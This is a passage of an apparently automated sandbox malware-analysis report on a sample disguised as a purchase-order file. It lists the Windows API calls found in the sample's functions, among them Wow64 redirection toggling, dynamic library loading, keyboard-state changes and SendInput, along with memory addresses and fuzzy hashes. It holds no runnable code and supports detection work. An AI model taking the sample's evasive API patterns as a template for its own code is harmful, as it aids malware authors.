                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                      • API String ID: 2574300362-2819208100
                                                                                                                                                                                                      • Opcode ID: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
                                                                                                                                                                                                      • Instruction ID: c2c24ff20b62a58202260a8ac82467be98224401b9ca7413dff3875aec422145
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38E09270A46304EFDB61AFA1AD0DF097B64B700706F240835F509921F0CBBA94108B1C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                                                                                                      • Opcode ID: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
                                                                                                                                                                                                      • Instruction ID: 4bb50aad0237944cfab0efe33b29d805611698b4e44c1c58e7d0ac381245c981
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE0ECB1805628AFCA1697509D05DFD737CA784741F5044D3B90AA2014D63D9BAAAB2F
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004621FB,?,004623EF), ref: 00462213
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00462225
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-399901964
                                                                                                                                                                                                      • Opcode ID: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
                                                                                                                                                                                                      • Instruction ID: 394556c6ca59c9a21163b339209c69f1bda373faab45590677b55d6d9d69d704
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D05E34801B12AFC7215B31A90864677D4AF04704B10486FA841A2290E6B8D8808768
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004042EC,?,004042AA,?), ref: 00404304
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404316
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                                                                                                      • Opcode ID: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
                                                                                                                                                                                                      • Instruction ID: 8e2625daa83c3a9d930da8d8dbc3e06159fd1fb9ec63ca39b981bd2942dc7d0d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0D0A7B0900712AFCB205F21EC0C74677D4AF44701B10483FE941E22F4D7B8C8808728
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,004041BB,00404341,?,0040422F,?,004041BB,?,?,?,?,004039FE,?,00000001), ref: 00404359
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0040436B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                                                                                                      • Opcode ID: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
                                                                                                                                                                                                      • Instruction ID: 3d90eeb04a118de8df55b6892bbe8ede2cd4c825abe2ba33daa0fdaf18675234
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D0A7B0900712AFC7305F35E80CB4677D4AF10715B10483FE881E22D0D7B8D8808728
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0044052F,?,004406D7), ref: 00440572
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00440584
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-1587604923
                                                                                                                                                                                                      • Opcode ID: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
                                                                                                                                                                                                      • Instruction ID: b5979cb841ee170266d89ba9e623a11cea52974f8194418e85b48c4c5a062689
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43D05E31800712AAD7209F20A80CB5677E4AF04700B20892FE94192294D6B8C4908B28
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0044051D,?,004405FE), ref: 00440547
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00440559
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-1071820185
                                                                                                                                                                                                      • Opcode ID: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
                                                                                                                                                                                                      • Instruction ID: 7c59fbfb6b4ca0e17cfd6f52eeb59ceeab1eb4fde61983d69c0c64ea1134d3dc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D0A730800722AFD720DF20F80C75677E4EF10701B20CC3FE44AD2294D6B8C8808B28
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0045ECBE,?,0045EBBB), ref: 0045ECD6
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0045ECE8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                                                      • Opcode ID: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
                                                                                                                                                                                                      • Instruction ID: dcea914721d27dac4ff341c8df08104a786117995b40904736e34123f29db048
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6D0A730800723AFCB255F62E84C74777E4AF00701B10883FFC56D2292DBB8C8849B28
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0045AAB4
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0045AABF
                                                                                                                                                                                                        • Part of subcall function 00440213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0045AACA
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0045AD9D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                                                      • Opcode ID: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
                                                                                                                                                                                                      • Instruction ID: 5d8e7bca6c7e322d321c672a29ad7db6d4310834907c2f740fef39762054d400
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABA17C356047019FC701EF25C481B1AB7E5BF48315F04855EFA969B3A2CB38ED59CB8A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2808897238-0
                                                                                                                                                                                                      • Opcode ID: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
                                                                                                                                                                                                      • Instruction ID: ca1cb1d64e1576214c9d43b4a1f36021c070d9c51f8d913170cfb391135d6413
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E851A570A443069BDB24AF66D49166EB3E5EF4C314F20A82FE946D72D1DBBC9C81870D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3877424927-0
                                                                                                                                                                                                      • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                                                                      • Instruction ID: 2ebd63b5f1109b17f0c2738a0f9f126dfcc81151958d9025ba2ca9ad80a75854
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F351E8B0B00225ABCF249F69A88455F77B5AF40325F64862FF825963D0D77C9F51CB48
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(00BEA948,?), ref: 0046C544
                                                                                                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 0046C574
                                                                                                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0046C5DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                      • Opcode ID: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
                                                                                                                                                                                                      • Instruction ID: 87e5a9bfdfff9c845bf647487e866e9cced1a94fbcbcc4f7d8d1e25b4db0f31c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6515E75A00214AFCF10DF68C8C0ABE77B5EB55324F10866AF89597291E734ED41CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0043C462
                                                                                                                                                                                                      • __itow.LIBCMT ref: 0043C49C
                                                                                                                                                                                                        • Part of subcall function 0043C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0043C753
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0043C505
                                                                                                                                                                                                      • __itow.LIBCMT ref: 0043C55A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                                      • Opcode ID: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
                                                                                                                                                                                                      • Instruction ID: 800f785b87ce5464c2f688b8ea43766e1c02cbf4e719b26cad73e40aff914bb9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4041B571A00218BBDF21DF55C892BEE7BB5AF58704F00102EF905B72C1DB789A458BA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00443966
                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00443982
                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004439EF
                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00443A4D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
